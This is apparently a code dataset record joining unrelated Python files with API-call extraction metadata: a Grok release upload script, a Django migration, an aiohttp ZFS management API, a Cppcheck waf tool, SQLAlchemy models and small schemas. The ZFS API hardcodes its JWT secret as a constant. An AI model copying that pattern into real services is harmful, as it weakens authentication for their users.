'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1588, 1599), False, 'from mc import List, Some, Nothing, add\n'), ((1825, 1846), 'mc.List', 'List', (["['A', 'C', 'D']"], {}), "(['A', 'C', 'D'])\n", (1829, 1846), False, 'from mc import List, Some, Nothing, add\n'), ((1969, 1985), 'mc.List', 'List', (["['1', '2']"], {}), "(['1', '2'])\n", (1973, 1985), False, 'from mc import List, Some, Nothing, add\n'), ((2066, 2074), 'mc.List', 'List', (['[]'], {}), '([])\n', (2070, 2074), False, 'from mc import List, Some, Nothing, add\n'), ((2148, 2157), 'mc.List', 'List', (['[1]'], {}), '([1])\n', (2152, 2157), False, 'from mc import List, Some, Nothing, add\n'), ((2240, 2255), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2244, 2255), False, 'from mc import List, Some, Nothing, add\n'), ((2341, 2356), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2345, 2356), False, 'from mc import List, Some, Nothing, add\n'), ((2437, 2452), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2441, 2452), False, 'from mc import List, Some, Nothing, add\n'), ((2525, 2537), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (2529, 2537), False, 'from mc import List, Some, Nothing, add\n'), ((2625, 2637), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (2629, 2637), False, 'from mc import List, Some, Nothing, add\n'), ((2697, 2709), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (2701, 2709), False, 'from mc import List, Some, Nothing, add\n'), ((2764, 2779), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2768, 2779), False, 'from mc import List, Some, Nothing, add\n'), ((2838, 2853), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2842, 2853), False, 'from mc import List, Some, Nothing, add\n'), ((776, 791), 'mc.List', 'List', (['[5, 6, 7]'], {}), '([5, 6, 7])\n', (780, 791), False, 'from mc import List, Some, Nothing, add\n')] |
import sys
import re
import os
import commands
HOST = 'grok.zope.org'
RELEASEINFOPATH = '/var/www/html/grok/releaseinfo'
def _upload_gtk_versions(packageroot, version):
# Create the releaseinfo directory for this version.
cmd = 'ssh %s "mkdir %s/%s"' % (HOST, RELEASEINFOPATH, version)
print(cmd + '\n')
print(commands.getoutput(cmd))
# ``scp`` the file to the given destination.
versions_filename = os.path.join(packageroot, 'grok.cfg')
cmd = 'scp %s %s:%s/%s/versions.cfg' % (
versions_filename, HOST, RELEASEINFOPATH, version)
print(cmd + '\n')
print(commands.getoutput(cmd))
def upload_entrypoint(data):
if data['name'] != 'groktoolkit':
# We're dealing with another package that somehow depends on
# groktoolkit. Skip the step in that case.
return
packageroot = data['workingdir']
version = data['version']
_upload_gtk_versions(packageroot, version)
def upload_gtk_versions():
packageroot = os.getcwd() # Ugh.
version = sys.argv[1] # Ugh.
_upload_gtk_versions(packageroot, version)
| [
"commands.getoutput",
"os.path.join",
"os.getcwd"
] | [((426, 463), 'os.path.join', 'os.path.join', (['packageroot', '"""grok.cfg"""'], {}), "(packageroot, 'grok.cfg')\n", (438, 463), False, 'import os\n'), ((988, 999), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (997, 999), False, 'import os\n'), ((328, 351), 'commands.getoutput', 'commands.getoutput', (['cmd'], {}), '(cmd)\n', (346, 351), False, 'import commands\n'), ((600, 623), 'commands.getoutput', 'commands.getoutput', (['cmd'], {}), '(cmd)\n', (618, 623), False, 'import commands\n')] |
# Generated by Django 3.1 on 2020-12-25 15:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('obywatele', '0019_auto_20201225_1621'),
]
operations = [
migrations.AlterField(
model_name='uzytkownik',
name='business',
field=models.CharField(blank=True, help_text='If you are running a business', max_length=200, null=True, verbose_name='Business'),
),
migrations.AlterField(
model_name='uzytkownik',
name='city',
field=models.CharField(blank=True, help_text='Where you are spending most of your time', max_length=100, null=True, verbose_name='City'),
),
migrations.AlterField(
model_name='uzytkownik',
name='fb',
field=models.CharField(blank=True, help_text='Link to Facebook profile', max_length=500, null=True, verbose_name='Facebook'),
),
migrations.AlterField(
model_name='uzytkownik',
name='for_sale',
field=models.CharField(blank=True, help_text='Stuff you have for sale', max_length=500, null=True, verbose_name='For sale'),
),
migrations.AlterField(
model_name='uzytkownik',
name='hobby',
field=models.CharField(blank=True, help_text='Hobbies you have', max_length=200, null=True, verbose_name='Hobby'),
),
migrations.AlterField(
model_name='uzytkownik',
name='i_need',
field=models.CharField(blank=True, help_text='What do you need', max_length=500, null=True, verbose_name='I need'),
),
migrations.AlterField(
model_name='uzytkownik',
name='job',
field=models.CharField(blank=True, help_text='Your profession', max_length=500, null=True, verbose_name='Job'),
),
migrations.AlterField(
model_name='uzytkownik',
name='knowledge',
field=models.CharField(blank=True, help_text='Knowledge you have', max_length=500, null=True, verbose_name='Knowledge'),
),
migrations.AlterField(
model_name='uzytkownik',
name='other',
field=models.CharField(blank=True, help_text='Other things about worth mentioning', max_length=500, null=True, verbose_name='Other'),
),
migrations.AlterField(
model_name='uzytkownik',
name='responsibilities',
field=models.CharField(blank=True, help_text='Tasks performed in our group', max_length=2000, null=True, verbose_name='Responsibilities'),
),
migrations.AlterField(
model_name='uzytkownik',
name='skills',
field=models.CharField(blank=True, help_text='What practical skills do you have', max_length=500, null=True, verbose_name='Skills'),
),
migrations.AlterField(
model_name='uzytkownik',
name='to_borrow',
field=models.CharField(blank=True, help_text='Stuff you can borrow to others', max_length=500, null=True, verbose_name='To borrow'),
),
migrations.AlterField(
model_name='uzytkownik',
name='to_give_away',
field=models.CharField(blank=True, help_text='Things you are willing to give away for free', max_length=2000, null=True, verbose_name='To give away'),
),
migrations.AlterField(
model_name='uzytkownik',
name='want_to_learn',
field=models.CharField(blank=True, help_text='Things you would like to learn', max_length=500, null=True, verbose_name='I want to learn'),
),
]
| [
"django.db.models.CharField"
] | [((342, 469), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""If you are running a business"""', 'max_length': '(200)', 'null': '(True)', 'verbose_name': '"""Business"""'}), "(blank=True, help_text='If you are running a business',\n max_length=200, null=True, verbose_name='Business')\n", (358, 469), False, 'from django.db import migrations, models\n'), ((589, 728), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Where you are spending most of your time"""', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""City"""'}), "(blank=True, help_text=\n 'Where you are spending most of your time', max_length=100, null=True,\n verbose_name='City')\n", (605, 728), False, 'from django.db import migrations, models\n'), ((841, 963), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Link to Facebook profile"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Facebook"""'}), "(blank=True, help_text='Link to Facebook profile',\n max_length=500, null=True, verbose_name='Facebook')\n", (857, 963), False, 'from django.db import migrations, models\n'), ((1087, 1208), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Stuff you have for sale"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""For sale"""'}), "(blank=True, help_text='Stuff you have for sale',\n max_length=500, null=True, verbose_name='For sale')\n", (1103, 1208), False, 'from django.db import migrations, models\n'), ((1329, 1440), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Hobbies you have"""', 'max_length': '(200)', 'null': '(True)', 'verbose_name': '"""Hobby"""'}), "(blank=True, help_text='Hobbies you have', max_length=200,\n null=True, verbose_name='Hobby')\n", (1345, 1440), False, 'from django.db import migrations, models\n'), ((1562, 1674), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""What do you need"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""I need"""'}), "(blank=True, help_text='What do you need', max_length=500,\n null=True, verbose_name='I need')\n", (1578, 1674), False, 'from django.db import migrations, models\n'), ((1793, 1901), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Your profession"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Job"""'}), "(blank=True, help_text='Your profession', max_length=500,\n null=True, verbose_name='Job')\n", (1809, 1901), False, 'from django.db import migrations, models\n'), ((2026, 2143), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Knowledge you have"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Knowledge"""'}), "(blank=True, help_text='Knowledge you have', max_length=500,\n null=True, verbose_name='Knowledge')\n", (2042, 2143), False, 'from django.db import migrations, models\n'), ((2264, 2399), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Other things about worth mentioning"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Other"""'}), "(blank=True, help_text=\n 'Other things about worth mentioning', max_length=500, null=True,\n verbose_name='Other')\n", (2280, 2399), False, 'from django.db import migrations, models\n'), ((2526, 2661), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Tasks performed in our group"""', 'max_length': '(2000)', 'null': '(True)', 'verbose_name': '"""Responsibilities"""'}), "(blank=True, help_text='Tasks performed in our group',\n max_length=2000, null=True, verbose_name='Responsibilities')\n", (2542, 2661), False, 'from django.db import migrations, models\n'), ((2783, 2912), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""What practical skills do you have"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Skills"""'}), "(blank=True, help_text='What practical skills do you have',\n max_length=500, null=True, verbose_name='Skills')\n", (2799, 2912), False, 'from django.db import migrations, models\n'), ((3037, 3166), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Stuff you can borrow to others"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""To borrow"""'}), "(blank=True, help_text='Stuff you can borrow to others',\n max_length=500, null=True, verbose_name='To borrow')\n", (3053, 3166), False, 'from django.db import migrations, models\n'), ((3294, 3447), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Things you are willing to give away for free"""', 'max_length': '(2000)', 'null': '(True)', 'verbose_name': '"""To give away"""'}), "(blank=True, help_text=\n 'Things you are willing to give away for free', max_length=2000, null=\n True, verbose_name='To give away')\n", (3310, 3447), False, 'from django.db import migrations, models\n'), ((3570, 3705), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Things you would like to learn"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""I want to learn"""'}), "(blank=True, help_text='Things you would like to learn',\n max_length=500, null=True, verbose_name='I want to learn')\n", (3586, 3705), False, 'from django.db import migrations, models\n')] |
import uuid
from datetime import datetime, timedelta
from controllers import zfsController
import jwt
import pam
import render
JWT_SECRET = "<KEY>"
JWT_ALGORITHM = "HS256"
JWT_EXP_DELTA_SECONDS = 4300
async def index(request):
return render.json({'error': 'nothing to see here...'}, 200)
async def auth(request):
try:
data = await request.json()
user = data['username']
password = data['password']
if pam.authenticate(user, password):
payload = {
'user': user,
'session_id': str(uuid.uuid4()),
'exp': datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)
}
jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)
return await render.json({'token': jwt_token.decode('utf-8')}, 200)
else:
return None
except Exception as e:
return await render.json({'error': str(e)}, 200)
async def check_token(request):
try:
jwt_token = request.headers.get('Authorization', None)
payload = jwt.decode(jwt_token, JWT_SECRET, algorithms=[JWT_ALGORITHM])
return payload['session_id']
except (jwt.DecodeError, jwt.ExpiredSignatureError):
return False
async def create_pool(request):
check = await check_token(request)
if check:
try:
data = await request.json()
res = await zfsController.create_pool(data['name'], data['raid'], data['devices'])
return await render.json({"success": res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 200)
else:
return await render.json({'error': 'Invalid or expired token'}, 403)
async def delete_pool(request):
check = await check_token(request)
if check:
try:
data = await request.json()
res = await zfsController.delete_pool(data['name'])
return await render.json({"success": res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 200)
else:
return await render.json({'error': 'Invalid or expired token'}, 403)
async def check_status(request):
check = await check_token(request)
if check:
try:
res = await zfsController.get_status()
return await render.json({'msg': res}, 200)
except Exception as e:
print(str(e))
async def get_storage_info(request):
check = await check_token(request)
if check:
try:
res = await zfsController.get_disk_info()
return await render.json(res, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 500)
async def get_io_status(request):
check = await check_token(request)
if check:
try:
res = await zfsController.get_IO_stats()
return await render.json({'msg': res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 500)
async def add_disk(request):
check = await check_token(request)
if check:
try:
data = await request.json()
res = await zfsController.add_new_disk(data['pool'], data['device'])
return await render.json({"success": res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 500)
else:
return await render.json({'error': 'Invalid or expired token'}, 403)
async def add_spare_disk(request):
check = await check_token(request)
if check:
try:
data = await request.json()
res = await zfsController.add_spare_disk(data['pool'], data['device'])
return await render.json({"success": res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 200)
else:
return await render.json({'error': 'Invalid or expired token'}, 403)
async def replace_disk(request):
check = await check_token(request)
if check:
try:
data = await request.json()
res = await zfsController.replace_disk(data['pool'], data['old_device'], data['new_device'])
return await render.json({"success": res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 200)
else:
return await render.json({'error': 'Invalid or expired token'}, 403)
async def set_mountpoint(request):
check = await check_token(request)
if check:
try:
data = await request.json()
res = await zfsController.set_mountpoint(data['mountpoint'], data['pool'])
return await render.json({"success": res}, 200)
except Exception as e:
print(str(e))
return await render.raw({'error': str(e)}, 200)
else:
return await render.json({'error': 'Invalid or expired token'}, 403)
| [
"jwt.decode",
"controllers.zfsController.set_mountpoint",
"controllers.zfsController.create_pool",
"controllers.zfsController.get_disk_info",
"datetime.datetime.utcnow",
"controllers.zfsController.get_status",
"controllers.zfsController.add_new_disk",
"controllers.zfsController.add_spare_disk",
"con... | [((242, 295), 'render.json', 'render.json', (["{'error': 'nothing to see here...'}", '(200)'], {}), "({'error': 'nothing to see here...'}, 200)\n", (253, 295), False, 'import render\n'), ((447, 479), 'pam.authenticate', 'pam.authenticate', (['user', 'password'], {}), '(user, password)\n', (463, 479), False, 'import pam\n'), ((1079, 1140), 'jwt.decode', 'jwt.decode', (['jwt_token', 'JWT_SECRET'], {'algorithms': '[JWT_ALGORITHM]'}), '(jwt_token, JWT_SECRET, algorithms=[JWT_ALGORITHM])\n', (1089, 1140), False, 'import jwt\n'), ((706, 752), 'jwt.encode', 'jwt.encode', (['payload', 'JWT_SECRET', 'JWT_ALGORITHM'], {}), '(payload, JWT_SECRET, JWT_ALGORITHM)\n', (716, 752), False, 'import jwt\n'), ((1699, 1754), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (1710, 1754), False, 'import render\n'), ((2167, 2222), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (2178, 2222), False, 'import render\n'), ((3565, 3620), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (3576, 3620), False, 'import render\n'), ((4055, 4110), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (4066, 4110), False, 'import render\n'), ((4565, 4620), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (4576, 4620), False, 'import render\n'), ((5059, 5114), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (5070, 5114), False, 'import render\n'), ((1420, 1490), 'controllers.zfsController.create_pool', 'zfsController.create_pool', (["data['name']", "data['raid']", "data['devices']"], {}), "(data['name'], data['raid'], data['devices'])\n", (1445, 1490), False, 'from controllers import zfsController\n'), ((1516, 1550), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (1527, 1550), False, 'import render\n'), ((1919, 1958), 'controllers.zfsController.delete_pool', 'zfsController.delete_pool', (["data['name']"], {}), "(data['name'])\n", (1944, 1958), False, 'from controllers import zfsController\n'), ((1984, 2018), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (1995, 2018), False, 'import render\n'), ((2348, 2374), 'controllers.zfsController.get_status', 'zfsController.get_status', ([], {}), '()\n', (2372, 2374), False, 'from controllers import zfsController\n'), ((2400, 2430), 'render.json', 'render.json', (["{'msg': res}", '(200)'], {}), "({'msg': res}, 200)\n", (2411, 2430), False, 'import render\n'), ((2617, 2646), 'controllers.zfsController.get_disk_info', 'zfsController.get_disk_info', ([], {}), '()\n', (2644, 2646), False, 'from controllers import zfsController\n'), ((2672, 2693), 'render.json', 'render.json', (['res', '(200)'], {}), '(res, 200)\n', (2683, 2693), False, 'import render\n'), ((2937, 2965), 'controllers.zfsController.get_IO_stats', 'zfsController.get_IO_stats', ([], {}), '()\n', (2963, 2965), False, 'from controllers import zfsController\n'), ((2991, 3021), 'render.json', 'render.json', (["{'msg': res}", '(200)'], {}), "({'msg': res}, 200)\n", (3002, 3021), False, 'import render\n'), ((3300, 3356), 'controllers.zfsController.add_new_disk', 'zfsController.add_new_disk', (["data['pool']", "data['device']"], {}), "(data['pool'], data['device'])\n", (3326, 3356), False, 'from controllers import zfsController\n'), ((3382, 3416), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (3393, 3416), False, 'import render\n'), ((3788, 3846), 'controllers.zfsController.add_spare_disk', 'zfsController.add_spare_disk', (["data['pool']", "data['device']"], {}), "(data['pool'], data['device'])\n", (3816, 3846), False, 'from controllers import zfsController\n'), ((3872, 3906), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (3883, 3906), False, 'import render\n'), ((4276, 4361), 'controllers.zfsController.replace_disk', 'zfsController.replace_disk', (["data['pool']", "data['old_device']", "data['new_device']"], {}), "(data['pool'], data['old_device'], data['new_device']\n )\n", (4302, 4361), False, 'from controllers import zfsController\n'), ((4382, 4416), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (4393, 4416), False, 'import render\n'), ((4788, 4850), 'controllers.zfsController.set_mountpoint', 'zfsController.set_mountpoint', (["data['mountpoint']", "data['pool']"], {}), "(data['mountpoint'], data['pool'])\n", (4816, 4850), False, 'from controllers import zfsController\n'), ((4876, 4910), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (4887, 4910), False, 'import render\n'), ((569, 581), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (579, 581), False, 'import uuid\n'), ((607, 624), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (622, 624), False, 'from datetime import datetime, timedelta\n'), ((627, 667), 'datetime.timedelta', 'timedelta', ([], {'seconds': 'JWT_EXP_DELTA_SECONDS'}), '(seconds=JWT_EXP_DELTA_SECONDS)\n', (636, 667), False, 'from datetime import datetime, timedelta\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @copyright © 2010 - 2021, Fraunhofer-Gesellschaft zur Foerderung der
# angewandten Forschung e.V. All rights reserved.
#
# BSD 3-Clause License
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# We kindly request you to use one or more of the following phrases to refer to
# foxBMS in your hardware, software, documentation or advertising materials:
#
# ″This product uses parts of foxBMS®″
#
# ″This product includes parts of foxBMS®″
#
# ″This product is derived from foxBMS®″
"""Implements a waf tool to configure Cppcheck
For information on Cppcheck see http://cppcheck.sourceforge.net/.
"""
import os
from waflib import Utils, Task, TaskGen, Logs
class cppcheck(Task.Task): # pylint: disable=invalid-name
"""Call cppcheck"""
#: str: color in which the command line is displayed in the terminal
color = "GREEN"
#: str: Cppcheck handles the need for a re-run, so always run this task
always_run = True
run_str = (
"${CPPCHECK} --project=${CPPCHECK_MAIN_PROJECT_FILE} --cppcheck-build-dir=. "
"--exitcode-suppressions=${CPPCHECK_RULE_SUPPRESSION_FILE} -f "
"--std=c99 --enable=warning,style,performance,portability,information,unusedFunction "
"--addon=${CPPCHECK_ADDON_CNF_MISRA} --error-exitcode=${CPPCHECK_EXITCODE_FAIL} "
"--suppressions-list=${CPPCHECK_RULE_SUPPRESSION_FILE}",
)
"""str: string to be interpolated to create the command line to run
cppcheck."""
@TaskGen.feature("cppcheck")
def add_cppcheck_task(self):
"""Task creator for cppcheck"""
self.create_task("cppcheck")
def options(opt):
"""Defines options that can be passed to cppcheck tool"""
if Utils.is_win32:
doc_paths = [
os.path.join(os.path.expanduser("~"), "Documents", "MISRA-C"),
os.path.join(os.environ["PUBLIC"], "Documents", "MISRA-C"),
]
else:
doc_paths = [
os.path.join(os.path.expanduser("~"), "MISRA-C"),
]
rules_files = [
opt.root.find_node(os.path.join(x, "rules-2012.txt")) for x in doc_paths
]
rules_file = False
if any(rules_files):
rules_file = list(filter(None, rules_files))[0].abspath()
opt.add_option(
"--misra-rules-file",
action="store",
default=rules_file,
dest="misra_rules_file",
help="Sets the path to the MISRA rules file for cppcheck",
)
def configure(conf):
"""configuration step of the Cppcheck waf tool
- Find cppcheck
- Search for the MISRA-C rules text
"""
# check first for cppcheck in the PATH. If it is not present search in
# the default installation directory
conf.start_msg("Checking for program 'cppcheck'")
conf.find_program("cppcheck", mandatory=False)
if not conf.env.CPPCHECK:
if Utils.is_win32:
conf.find_program(
"cppcheck",
path_list=[os.path.join(os.environ["ProgramFiles"], "Cppcheck")],
mandatory=False,
)
conf.end_msg(conf.env.get_flat("CPPCHECK"))
if not conf.env.CPPCHECK:
return
conf.start_msg("Checking for MISRA-C rules file")
rules_file = []
if conf.options.misra_rules_file:
rules_file = conf.root.find_node(os.path.abspath(conf.options.misra_rules_file))
if not rules_file:
Logs.warn(
f"{os.path.abspath(conf.options.misra_rules_file)} does not exist. Ignoring input."
)
else:
conf.env.append_unique("RULES_FILE", rules_file.abspath())
conf.end_msg(conf.env.get_flat("RULES_FILE"))
| [
"os.path.abspath",
"os.path.join",
"os.path.expanduser",
"waflib.TaskGen.feature"
] | [((3005, 3032), 'waflib.TaskGen.feature', 'TaskGen.feature', (['"""cppcheck"""'], {}), "('cppcheck')\n", (3020, 3032), False, 'from waflib import Utils, Task, TaskGen, Logs\n'), ((3345, 3403), 'os.path.join', 'os.path.join', (["os.environ['PUBLIC']", '"""Documents"""', '"""MISRA-C"""'], {}), "(os.environ['PUBLIC'], 'Documents', 'MISRA-C')\n", (3357, 3403), False, 'import os\n'), ((3566, 3599), 'os.path.join', 'os.path.join', (['x', '"""rules-2012.txt"""'], {}), "(x, 'rules-2012.txt')\n", (3578, 3599), False, 'import os\n'), ((4807, 4853), 'os.path.abspath', 'os.path.abspath', (['conf.options.misra_rules_file'], {}), '(conf.options.misra_rules_file)\n', (4822, 4853), False, 'import os\n'), ((3283, 3306), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (3301, 3306), False, 'import os\n'), ((3472, 3495), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (3490, 3495), False, 'import os\n'), ((4456, 4508), 'os.path.join', 'os.path.join', (["os.environ['ProgramFiles']", '"""Cppcheck"""'], {}), "(os.environ['ProgramFiles'], 'Cppcheck')\n", (4468, 4508), False, 'import os\n'), ((4924, 4970), 'os.path.abspath', 'os.path.abspath', (['conf.options.misra_rules_file'], {}), '(conf.options.misra_rules_file)\n', (4939, 4970), False, 'import os\n')] |
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, DateTime, Sequence
Base = declarative_base()
class Subscription(Base):
__tablename__ = 'subscriptions'
id = Column(Integer, Sequence('subscription_id_seq'), primary_key=True)
sr_id = Column(String, index=True)
method = Column(String)
contact = Column(String)
class UpdateInfoItem(Base):
__tablename__ = 'updateinfo'
key = Column(String, primary_key=True)
value = Column(String)
| [
"sqlalchemy.Sequence",
"sqlalchemy.Column",
"sqlalchemy.ext.declarative.declarative_base"
] | [((131, 149), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (147, 149), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((313, 339), 'sqlalchemy.Column', 'Column', (['String'], {'index': '(True)'}), '(String, index=True)\n', (319, 339), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((354, 368), 'sqlalchemy.Column', 'Column', (['String'], {}), '(String)\n', (360, 368), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((383, 397), 'sqlalchemy.Column', 'Column', (['String'], {}), '(String)\n', (389, 397), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((478, 510), 'sqlalchemy.Column', 'Column', (['String'], {'primary_key': '(True)'}), '(String, primary_key=True)\n', (484, 510), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((523, 537), 'sqlalchemy.Column', 'Column', (['String'], {}), '(String)\n', (529, 537), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((248, 279), 'sqlalchemy.Sequence', 'Sequence', (['"""subscription_id_seq"""'], {}), "('subscription_id_seq')\n", (256, 279), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n')] |
#!/usr/bin/env python
# Motherstarter setup file
from setuptools import setup, find_packages
from motherstarter import __version__, __author__
# Open and read README file
with open("README.md", "r", encoding="utf-8") as f:
README = f.read()
# Setup requirements to be installed
requirements = []
with open("requirements.txt") as f:
requirements = f.read().splitlines()
setup(
author_email="<EMAIL>",
description="Network automation inventory data translation tool.",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/writememe/motherstarter",
name="motherstarter",
license="Apache License 2.0",
version=__version__,
author=__author__,
packages=find_packages(),
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS",
],
python_requires=">=3.7",
include_package_data=True,
install_requires=requirements,
entry_points="""
[console_scripts]
motherstarter=motherstarter.motherstarter:cli
""",
)
| [
"setuptools.find_packages"
] | [((744, 759), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (757, 759), False, 'from setuptools import setup, find_packages\n')] |
import graphene
from typing import cast
from graphene_django import DjangoObjectType
from graphene_django.debug import DjangoDebug
from django.contrib.auth import get_user_model
import devind_dictionaries.schema
class UserType(DjangoObjectType):
class Meta:
model = get_user_model()
fields = ('id', 'username', 'last_name', 'email', 'is_active',)
class Query(
devind_dictionaries.schema.Query,
graphene.ObjectType
):
debug = graphene.Field(DjangoDebug, name='__debug')
class Mutation(
devind_dictionaries.schema.Mutation,
graphene.ObjectType
):
pass
schema = graphene.Schema(query=cast(graphene.ObjectType, Query), mutation=Mutation)
| [
"django.contrib.auth.get_user_model",
"graphene.Field",
"typing.cast"
] | [((465, 508), 'graphene.Field', 'graphene.Field', (['DjangoDebug'], {'name': '"""__debug"""'}), "(DjangoDebug, name='__debug')\n", (479, 508), False, 'import graphene\n'), ((284, 300), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (298, 300), False, 'from django.contrib.auth import get_user_model\n'), ((637, 669), 'typing.cast', 'cast', (['graphene.ObjectType', 'Query'], {}), '(graphene.ObjectType, Query)\n', (641, 669), False, 'from typing import cast\n')] |
import numpy as np
def main():
from fuzzi.evaluation import pate_train
from fuzzi.generated import pate_label
predictions = pate_label.outputs
truth = [x[-1] for x in pate_label.db_test]
print(predictions)
print(truth)
print('PATE accuracy = %f' % (np.mean(predictions == truth)))
| [
"numpy.mean"
